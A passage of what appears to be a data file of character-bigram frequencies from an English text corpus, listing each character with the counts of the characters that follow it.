4], ["y", 88], 
["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], ["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], ["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], 
["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], ["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], ["h", 5152], ["k", 34], ["m", 
374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], ["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], ["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 
8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], ["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], ["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 
55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], 
["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], [":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], [":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], 
["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], ["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], 
["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], ["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], 
["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], ["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], 
["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 220], ["N", 497], ["Q", 2], ["P", 2116], ["S", 220], ["R", 481], ["U", 44], ["T", 292], ["W", 18], ["V", 78], ["Y", 66], ["X", 6], ["Z", 2], ["a", 2], ["c", 208], ["b", 496], ["e", 2], ["d", 372], ["g", 352], ["f", 1144], ["i", 66], ["h", 554], ["k", 64], ["j", 4], ["m", 1358], ["l", 3042], ["o", 140], ["n", 12454], ["q", 4], ["p", 230], ["s", 2898], ["r", 1643], ["u", 754], ["t", 3060], ["w", 48], ["v", 60], ["y", 30], ["x", 2], ["z", 30]]], ["E", [["!", 20], [" ", 1253], ["\"", 2], ["'", 18], ["*", 2], ["-", 14], [",", 30], [".", 100], [":", 8], ["?", 4], ["A", 176], ["C", 152], ["B", 30], ["E", 92], ["D", 166], ["G", 32], ["F", 34], ["I", 60], ["H", 6], ["K", 8], ["M", 80], ["L", 142], ["O", 14], ["N", 490], ["Q", 6], ["P", 124], ["S", 360], ["R", 730], ["U", 18], ["T", 184], ["W", 90], ["V", 102], ["Y", 34], ["X", 64], ["a", 450], ["c", 46], ["b", 14], ["d", 90], ["g", 62], ["f", 20], ["i", 64], ["h", 58], ["k", 6], ["m", 1500], ["l", 226], ["o", 4], ["n", 1398], ["q", 20], ["p", 138], ["s", 148], ["r", 118], ["u", 358], ["t", 98], ["v", 1326], ["y", 70], ["x", 298], ["z", 2], ["}", 2]]], ["I", [["!", 34], [" ", 40514], ["\"", 4], ["'", 2748], ["-", 52], [",", 526], [".", 576], [";", 42], [":", 6], ["?", 88], ["A", 76], ["C", 182], ["B", 47], ["E", 82], ["D", 78], ["G", 140], ["F", 78], ["I", 1054], ["K", 12], ["M", 76], ["L", 150], ["O", 134], ["N", 704], ["Q", 4], ["P", 18], ["S", 277], ["R", 122], ["U", 2], ["T", 378], ["V", 298], ["X", 156], ["Z", 8], ["_", 46], ["a", 2], ["c", 146], ["b", 10], ["d", 16], ["g", 48], ["f", 1944], ["m", 196], ["l", 216], ["o", 30], ["n", 5298], ["p", 28], ["s", 930], ["r", 122], ["t", 8656], 
["v", 100], ["x", 2], ["z", 2]]], ["M", [["!", 4], [" ", 68], ["\"", 2], ["'", 12], ["-", 4], [",", 12], ["/", 8], [".", 1208], [":", 2], ["A", 346], ["C", 28], ["B", 34], ["E", 243], ["D", 6], ["G", 12], ["I", 130], ["M", 24], ["L", 2], ["O", 117], ["N", 16], ["P", 50], ["S", 26], ["R", 8], ["U", 28], ["W", 6], ["Y", 24], ["a", 8688], ["c", 378], ["e", 1576], ["f", 2], ["i", 2158], ["o", 4266], ["s", 2], ["r", 2578], ["u", 518], ["y", 1492]]], ["Q", [["U", 48], ["C", 2], ["u", 494], [".", 4]]], ["U", [["!", 2], [" ", 106], ["'", 6], [",", 2], [".", 10], ["A", 16], ["C", 48], ["B", 24], ["E", 54], ["D", 44], ["G", 12], ["F", 6], ["I", 12], ["K", 2], ["M", 60], ["L", 68], ["N", 116], ["P", 26], ["S", 130], ["R", 182], ["U", 2], ["T", 156], ["V", 2], ["Z", 6], ["c", 2], ["g", 12], ["h", 34], ["k", 4], ["m", 16], ["l", 30], ["n", 859], ["p", 360], ["s", 32], ["r", 68], ["t", 50], ["v", 16]]], ["Y", [["!", 4], [" ", 260], ["\"", 2], ["'", 4], ["-", 68], [",", 10], [".", 22], [";", 2], ["A", 2], ["B", 2], ["E", 26], ["L", 4], ["O", 112], ["S", 26], ["R", 4], ["T", 2], ["a", 122], ["c", 2], ["e", 1328], ["i", 10], ["o", 3878], ["s", 10], ["u", 26], ["v", 8]]], ["]", [["!", 2], [" ", 322], ["J", 2], ["-", 2], [",", 44], [".", 14], [";", 24], [">", 2]]], ["a", [["!", 310], [" ", 65518], ["\"", 24], ["'", 716], [")", 20], ["*", 1], ["-", 724], [",", 2766], [".", 1558], ["1", 2], [";", 152], [":", 30], ["?", 144], [">", 2], ["S", 2], ["_", 6], ["a", 122], ["`", 6], ["c", 35608], ["b", 19042], ["e", 752], ["d", 56288], ["g", 18377], ["f", 7666], ["i", 47228], ["h", 1140], ["k", 13604], ["j", 480], ["m", 24754], ["l", 68865], ["o", 314], ["n", 216874], ["q", 102], ["p", 18548], ["s", 105951], ["r", 97182], ["u", 12725], ["t", 135418], ["w", 10880], ["v", 25744], ["y", 29029], ["x", 666], ["z", 1906], ["}", 2]]], ["e", [["!", 3010], [" ", 487805], ["\"", 166], ["'", 4249], [")", 336], ["*", 10], ["-", 4298], [",", 40540], [".", 24278], [";", 3704], [":", 890], ["?", 2866], 
[">", 78], ["B", 2], ["I", 2], ["S", 2], ["[", 6], ["]", 18], ["_", 42], ["a", 79086], ["`", 2], ["c", 27918], ["b", 1598], ["e", 45884], ["d", 142368], ["g", 8394], ["f", 13916], ["i", 18692], ["h", 2842], ["k", 1590], ["j", 380], ["m", 31126], ["l", 54118], ["o", 4898], ["n", 129345], ["q", 1706], ["p", 17078], ["s", 100714], ["r", 205409], ["u", 2658], ["t", 41944], ["w", 11422], ["v", 24561], ["y", 23800], ["x", 14052], ["z", 560], ["}", 4]]], ["i", [["!", 50], [" ", 1222], ["\"", 2], ["'", 184], [")", 4], ["*", 2], ["-", 384], [",", 450], [".", 254], [";", 14], [":", 6], ["?", 14], ["@", 2], ["G", 2], ["Y", 2], ["]", 2], ["_", 8], ["a", 10716], ["c", 45183], ["b", 6986], ["e", 33445], ["d", 40015], ["g", 26388], ["f", 17002], ["i", 24], ["h", 72], ["k", 7006], ["j", 18], ["m", 40198], ["l", 43870], ["o", 33038], ["n", 232657], ["q", 394], ["p", 5884], ["s", 107323], ["r", 32008], ["u", 1844], ["t", 102683], ["w", 38], ["v", 16166], ["y", 2], ["x", 2074], ["z", 2892]]], ["m", [["!", 462], [" ", 35852], ["\"", 24], ["'", 294], [")", 58], ["-", 610], [",", 7564], [".", 6290], ["1", 2], [";", 758], [":", 298], ["?", 470], [">", 22], ["]", 2], ["a", 45673], ["c", 96], ["b", 7420], ["e", 83120], ["d", 36], ["g", 4], ["f", 768], ["i", 24836], ["h", 10], ["k", 22], ["m", 5770], ["l", 522], ["o", 32940], ["n", 1218], ["p", 15046], ["s", 8640], ["r", 202], ["u", 10278], ["t", 200], ["w", 24], ["y", 17480]]], ["q", [["a", 2], [" ", 2], ["u", 12073], [",", 2], ["'", 2]]], ["u", [["!", 428], [" ", 17752], ["\"", 16], ["'", 1182], [")", 6], ["-", 186], [",", 1924], [".", 1140], [";", 124], [":", 18], ["?", 428], ["S", 12], ["T", 2], ["_", 2], ["a", 6632], ["c", 12934], ["b", 5730], ["e", 10797], ["d", 6988], ["g", 18286], ["f", 2056], ["i", 9148], ["h", 30], ["k", 496], ["j", 84], ["m", 8440], ["l", 37068], ["o", 708], ["n", 43221], ["q", 64], ["p", 17232], ["s", 44836], ["r", 48568], ["u", 18], ["t", 49162], ["w", 10], ["v", 428], ["y", 210], ["x", 498], ["z", 722]]], 
